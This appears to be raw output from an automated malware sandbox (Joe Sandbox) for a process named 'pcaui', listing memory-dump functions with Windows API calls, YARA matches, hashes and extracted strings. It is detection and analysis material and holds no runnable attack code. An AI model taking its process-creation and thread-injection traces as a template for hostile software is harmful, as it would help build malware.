                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                    • Instruction ID: f066452714b09448ca518cedef2cdd835cd2ee78396eb75846dfab359af5bc4f
                                                                                    • Opcode Fuzzy Hash: f729aad71b325cdb97dbeb40763933413b5d6b7fb509c19989d913dea0fc555e
                                                                                    • Instruction Fuzzy Hash: C7011EBDD0020DABDF10EBA4DC41FAEB779AB44308F008195A908E7281F631E758CB92
                                                                                    APIs
                                                                                    • CreateProcessInternalW.KERNELBASE(?,?,?,?,0281868E,00000010,?,?,?,00000044,?,00000010,0281868E,?,?,?), ref: 02829C53
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateInternalProcess
                                                                                    • String ID:
                                                                                    • API String ID: 2186235152-0
                                                                                    • Opcode ID: 00e932b0c8124f1e58f9ffec9037a3f42d09918aa1618abac4be9b69da508bf4
                                                                                    • Instruction ID: 88847c065b9282438e1ead1f59dd2fbc6871b80ed7ab09238adc622b2934348b
                                                                                    • Opcode Fuzzy Hash: 00e932b0c8124f1e58f9ffec9037a3f42d09918aa1618abac4be9b69da508bf4
                                                                                    • Instruction Fuzzy Hash: 6B0180B6214509BBCB58DE9DDC81EEB77AEAF8C754F508108BA0DE3250D630FC518BA4
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02809DF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: b5e49728b0acdec9bcead66404fe76623fbc04345955d2dce6f1f4653f624a12
                                                                                    • Instruction ID: 1f246ec1af7771294cd657add0eb7999177f5eb234690c49e2906c1ea78ea98f
                                                                                    • Opcode Fuzzy Hash: b5e49728b0acdec9bcead66404fe76623fbc04345955d2dce6f1f4653f624a12
                                                                                    • Instruction Fuzzy Hash: 9CF0657B34131436E22065AD9C02FD7734DCB81B61F150056F60DEA5C1D5A1B94186E6
                                                                                    APIs
                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02809DF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateThread
                                                                                    • String ID:
                                                                                    • API String ID: 2422867632-0
                                                                                    • Opcode ID: 5912c503de3b571a966d09ebe02b121b9e859b7f0c6b5ca8c58eedf287c7f894
                                                                                    • Instruction ID: ab11df41b949b7f98d902863bf6e8e1b3ac9069349342b3e697629686ec090e4
                                                                                    • Opcode Fuzzy Hash: 5912c503de3b571a966d09ebe02b121b9e859b7f0c6b5ca8c58eedf287c7f894
                                                                                    • Instruction Fuzzy Hash: 64F0657A34031037E23065A98C47FDB775DCF82B61F150056F60DEB5C1DAA1B94587A6
                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(02811D99,?,02826223,02811D99,0282596F,02826223,?,02811D99,0282596F,00001000,?,?,00000000), ref: 02829B4F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap
                                                                                    • String ID:
                                                                                    • API String ID: 1279760036-0
                                                                                    • Opcode ID: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                    • Instruction ID: 163cd9828c64991d7ba6249ac6a5703da1d3add4d6d682d826173a6582d27d38
                                                                                    • Opcode Fuzzy Hash: 15222f882391a6f1df90ded557e8b56f0e9c0d35b675ce76b94a4fce58941576
                                                                                    • Instruction Fuzzy Hash: BAE06D79200214BBD614EF98DC45F9B77ADEFC8710F004409F909A7280D670B9118BB5
                                                                                    APIs
                                                                                    • RtlFreeHeap.NTDLL(00000000,00000004,00000000,74C08500,00000007,00000000,00000004,00000000,02814138,000000F4), ref: 02829B9F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeHeap
                                                                                    • String ID:
                                                                                    • API String ID: 3298025750-0
                                                                                    • Opcode ID: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                    • Instruction ID: 2858e472c969d913f6134335ec0bc7a5bf34aa444232aacd4ffd3b919827dff8
                                                                                    • Opcode Fuzzy Hash: a497164907bf5a419709db9d104f4aa982b6752a18a8ef3b78ce65f3c83b4e63
                                                                                    • Instruction Fuzzy Hash: F1E06D79610604BBD614EE99DC45FDB73ADEFC9710F004019F909A7241D630B8108BB5
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 028186FC
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: 3a0bcdd481e085fde582b2ede235406661690f0972f46897657c7cf6e4af0c75
                                                                                    • Instruction ID: 2d2ae01d47f846d670f67f6af7f6640460c9f650f1b263e307d744733c6bf34b
                                                                                    • Opcode Fuzzy Hash: 3a0bcdd481e085fde582b2ede235406661690f0972f46897657c7cf6e4af0c75
                                                                                    • Instruction Fuzzy Hash: 64E0263E22030427FB20AAA8DC46F62334C9F89728F184E60F81DDBAC1E338F4018250
                                                                                    APIs
                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02814932
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Load
                                                                                    • String ID:
                                                                                    • API String ID: 2234796835-0
                                                                                    • Opcode ID: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                    • Instruction ID: 976043e4c8b27b22981eacbb774b244d6af796582f0dc3ebb6099276bffce589
                                                                                    • Opcode Fuzzy Hash: dde08397e3d1080f24d77cc6b00d527da95b6d712252c6e7d203f8619dc81514
                                                                                    • Instruction Fuzzy Hash: F7E0D839A4014A9ECF00CFD0CCC1F9DB36CFB05618F0483C6D928D72D1E230AA068B81
                                                                                    APIs
                                                                                    • PostThreadMessageW.USER32(?,00000111), ref: 02811197
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: MessagePostThread
                                                                                    • String ID:
                                                                                    • API String ID: 1836367815-0
                                                                                    • Opcode ID: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                    • Instruction ID: 499757bf3f363087b15ee1f60b4138c9a5840a95f6ae225ddf62d751ffd2a617
                                                                                    • Opcode Fuzzy Hash: cd11d55857e50e9293af255402c5c86e331596148f99e511fa3e3e30c6db0de7
                                                                                    • Instruction Fuzzy Hash: 41D0C76BB4111C79A6115595BCC1DFEB75CDB855A5F004067FB0CD5140D661590606B1
                                                                                    APIs
                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,028120A0,028282AE,0282596F,02812066), ref: 028184F3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4466768645.0000000002800000.00000040.80000000.00040000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_2800000_pcaui.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: a548a0d2e80c88423ebb55a89dc3e6d2ebf7d55ce776d3ecefd0ada522135fcd
                                                                                    • Instruction ID: fe26e224ee0f4784637058b2236b2594b484e0945ad18d8a5af0d1828c10e8ff
                                                                                    • Opcode Fuzzy Hash: a548a0d2e80c88423ebb55a89dc3e6d2ebf7d55ce776d3ecefd0ada522135fcd
                                                                                    • Instruction Fuzzy Hash: 45D05E7D7903043BF640E6E88C47F16328D9B05794F058069B90DF7AC1EE64F1404AA7
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeThunk
                                                                                    • String ID:
                                                                                    • API String ID: 2994545307-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468020584.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4660000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468020584.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4660000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                    • API String ID: 0-3558027158
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                    • API String ID: 48624451-2108815105
                                                                                    Strings
                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04804787
                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04804655
                                                                                    • Execute=1, xrefs: 04804713
                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 048046FC
                                                                                    • ExecuteOptions, xrefs: 048046A0
                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04804742
                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04804725
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                    • API String ID: 0-484625025
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-$0$0
                                                                                    • API String ID: 1302938615-699404926
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$[$]:%u
                                                                                    • API String ID: 48624451-2819853543
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 0480031E
                                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 048002BD
                                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 048002E7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                    • API String ID: 0-2474120054
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 04807BAC
                                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04807B7F
                                                                                    • RTL: Resource at %p, xrefs: 04807B8E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 0-871070163
                                                                                    APIs
                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0480728C
                                                                                    Strings
                                                                                    • RTL: Re-Waiting, xrefs: 048072C1
                                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04807294
                                                                                    • RTL: Resource at %p, xrefs: 048072A3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                    • API String ID: 885266447-605551621
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: ___swprintf_l
                                                                                    • String ID: %%%u$]:%u
                                                                                    • API String ID: 48624451-3050659472
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID: __aulldvrm
                                                                                    • String ID: +$-
                                                                                    • API String ID: 1302938615-2137968064
                                                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction ID: ff0b5460fa5dc5610cf1d2d6d8c9036e395af9cd8b83a670e2a4c1f1e99d862a
                                                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                                                    • Instruction Fuzzy Hash: F1918271E202169BDF3CDE69C881ABEB7B5EF44720F54491AE865EB3C0E730A9418761
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468093810.0000000004760000.00000040.00001000.00020000.00000000.sdmp, Offset: 04760000, based on PE: true
                                                                                    • Associated: 00000008.00000002.4468093810.0000000004889000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.000000000488D000.00000040.00001000.00020000.00000000.sdmp
                                                                                    • Associated: 00000008.00000002.4468093810.00000000048FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4760000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: $$@
                                                                                    • API String ID: 0-1194432280
                                                                                    • Opcode ID: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                    • Instruction ID: f863d8b42fb40ff9630054135117c4f3dbed7dbff1843afedba06ef8e3ea0fad
                                                                                    • Opcode Fuzzy Hash: 373369a19a4a4181457bed351ccdf31e8602eb68bf791bf66f373b7a5858ea42
                                                                                    • Instruction Fuzzy Hash: 3A810AB1D002699BDB35CB54CC45BEAB7B4AB48714F0045DAEA19B7780E731AE84DFA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000008.00000002.4468020584.0000000004660000.00000040.00000800.00020000.00000000.sdmp, Offset: 04660000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_8_2_4660000_pcaui.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 95qp$p$ro|e$syta
                                                                                    • API String ID: 0-2460837372
                                                                                    • Opcode ID: 33eddae6a5e13a3b1b72197834273e0663856a9df791c688360b197c797f9f4e
                                                                                    • Instruction ID: f66c458c1d9201cecd1aada9593ac01fb190d59772be86dff03e1ab6f5164989
                                                                                    • Opcode Fuzzy Hash: 33eddae6a5e13a3b1b72197834273e0663856a9df791c688360b197c797f9f4e
                                                                                    • Instruction Fuzzy Hash: 2AF0273001C7C48BC705AF24C044799BBE1FFD930CF9006ADE8CADB291EA7A9641C78A